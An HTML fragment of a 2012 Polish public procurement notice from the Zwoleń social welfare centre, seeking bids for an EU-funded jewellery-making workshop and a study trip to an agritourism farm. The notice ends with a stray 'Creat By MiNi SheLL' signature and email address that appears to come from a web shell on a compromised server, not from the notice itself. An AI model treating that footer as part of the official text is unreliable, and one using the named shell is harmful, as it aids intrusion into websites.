<p>1.Zamawiający dopuszcza zmianę umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy    w formie aneksu  w następujących przypadkach:
2.Zmiany  kadry dydaktycznej, gdy konieczność jej dokonania wynika z przyczyn losowych niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań określonych w SIWZ. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona, Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ. 
3.Liczby uczestników zajęć i ich imiennego wykazu w sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy, niezależnych od Zamawiającego.
4.Zmian terminu rozpoczęcia lub zakończenia poszczególnej Części zamówienia wywołanej w szczególności nie skompletowaniem na czas pełnej grupy objętej zamówieniem lub przyczynami niezależnymi od Wykonawcy i Zamawiającego.
5.Zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn losowych niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia  wymagań technicznych i funkcjonalnych określonych w SIWZ.
6. Zmiany harmonogramów zajęć w uzasadnionych przypadkach i za zgodą Zamawiającego.
7.Zmiany podmiotów trzecich (podwykonawców) na etapie realizacji przedmiotu umowy na zasadach, których Wykonawca opierał się wskazując spełnienie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowemu podwykonawcy.
8.Zmiany sposobu w regulowaniu należności Wykonawcy, których nie można było przewidzieć przed zawarciem umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zwolen.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Zwoleniu
ul. Lubelska 6
26-700 Zwoleń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2012 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Zwoleniu ul. Lubelska 6, 26-700 Zwoleń, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską, ze środków Europejskiego Funduszu Społecznego w ramach programu operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie pomocy społecznej przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu w formie warsztatowej z zakresu rękodzieła artystycznego - wytwarzania sztucznej biżuterii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenie kursu w formie warsztatowej z zakresu rękodzieła artystycznego - wytwarzanie sztucznej biżuterii dla 14 kobiet uczestniczek projektu systemowego Uwierz w swoje możliwości  w wymiarze 30 godzin dydaktycznych (w tym: 5 godz. zajęć teoretycznych i 25 godz. zajęć warsztatowych - praktycznych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie 3 dniowego wyjazdu studyjnego do gospodarstwa agroturystycznego w Górach Świętokrzyskich ze zwiedzaniem zabytków i walorów przyrody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu 3 dniowego wyjazdu  studyjnego do gospodarstwa agroturystycznego  dla 16 osób (14 uczestniczek projektu i 2 pracowników  MOPS realizujących projekt).Wizyta w danym gospodarstwie ma na celu zapoznanie uczestników projektu ze specyfiką działalności w branży turystycznej, która może przyczynić się do aktywizacji   zawodowej i podjęcia inicjatyw w środowisku lokalnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com